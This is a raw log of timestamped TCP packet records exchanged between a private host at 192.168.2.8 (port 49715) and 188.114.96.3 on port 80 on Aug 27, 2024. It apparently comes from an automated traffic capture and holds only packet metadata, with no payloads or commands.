                                Aug 27, 2024 09:49:36.948348045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948410034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948421955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948452950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948510885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948564053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948600054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948714018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948725939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948736906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948750019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948769093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948791027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948792934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948885918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948903084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948915005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948920012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948925018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948932886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948940039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948961973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.949038029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949048042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949058056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949130058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.949192047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949203014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949213982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949225903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949232101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949237108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.949238062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949244022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949249029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.949328899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.949354887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035165071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035218000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035231113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035243034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035255909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035269022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035273075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035280943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035290003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035309076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035348892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035361052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035372972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035387039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035393953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035398960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035412073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035428047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035430908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035435915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035442114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035454035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035469055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035492897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035515070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035527945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035537958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035550117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035561085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035562992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035574913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035587072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035598040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035598993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035609961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035623074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035625935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035631895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035634995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035646915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035659075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035662889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035671949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035690069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035701036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035840034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035851955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035862923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035873890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035888910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035965919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035972118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.035978079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.035990000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036003113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036030054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.036052942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.036197901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036210060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036309958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.036314011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036325932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036336899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036349058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036360025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036372900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036374092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.036384106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036400080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.036408901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.036592007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.036693096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.037189960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.037199974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.037209988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.037223101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.037297964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.037318945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.037321091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.037329912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.037375927 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038031101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038042068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038053036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038070917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038083076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038089037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038094997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038108110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038110018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038141966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038255930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038268089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038279057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038290977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038304090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038315058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038326025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038350105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038378954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038382053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038431883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038450003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038459063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038472891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038500071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038511038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038522005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038532019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038557053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038645029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038656950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038672924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038691998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038707972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038774014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038784981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038795948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038808107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038820982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038825989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038831949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038844109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038849115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038858891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038917065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.038959026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.038997889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039010048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039022923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039035082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039047003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039047003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039058924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039072990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039081097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039114952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039544106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039556026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039567947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039604902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039628983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039701939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039712906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039724112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039741039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039746046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039760113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039771080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039784908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039787054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039796114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039808989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039819002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039832115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039844036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039848089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.039854050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.039881945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.040020943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.040033102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.040044069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.040057898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.040076971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.040107012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.040132046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.040143967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.040159941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.040185928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.040242910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.124905109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.124933004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.124947071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125020027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125031948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125042915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125055075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125082016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125092030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125104904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125114918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125140905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125150919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125206947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125262976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125291109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125299931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125329971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125488043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125499010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125530005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125543118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125595093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125622988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125647068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125658035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125669003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125683069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125694990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125710011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125766993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125778913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125794888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125812054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125812054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125829935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125931025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125942945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125953913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125967026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125979900 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.125984907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.125998974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126010895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126012087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126023054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126035929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126072884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126101971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126121044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126132965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126143932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126162052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126235008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126245975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126255989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126276970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126303911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126333952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126346111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126355886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126368046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126386881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126410961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126527071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126538992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126549959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126563072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126575947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126585007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126588106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126599073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.126605988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.126622915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.129223108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129235029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129245996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129281044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.129306078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.129308939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129322052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129333019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129344940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129404068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.129430056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.129586935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129601955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129614115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129642963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.129751921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129843950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.129853010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129981041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.129992008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130002975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130012035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130019903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.130038023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.130096912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130114079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130125046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130135059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.130136967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130147934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130158901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130162954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.130187988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.130846977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130897999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130906105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.130909920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130985022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.130989075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.130996943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131046057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.131048918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131061077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131071091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131083012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131094933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.131095886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131134033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.131225109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131237030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131252050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131263971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131264925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.131294012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.131421089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131429911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131437063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131448030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131460905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131473064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131486893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131500959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131525040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.131556988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.131712914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131724119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.131735086 CEST8049715188.114.96.3192.168.2.8
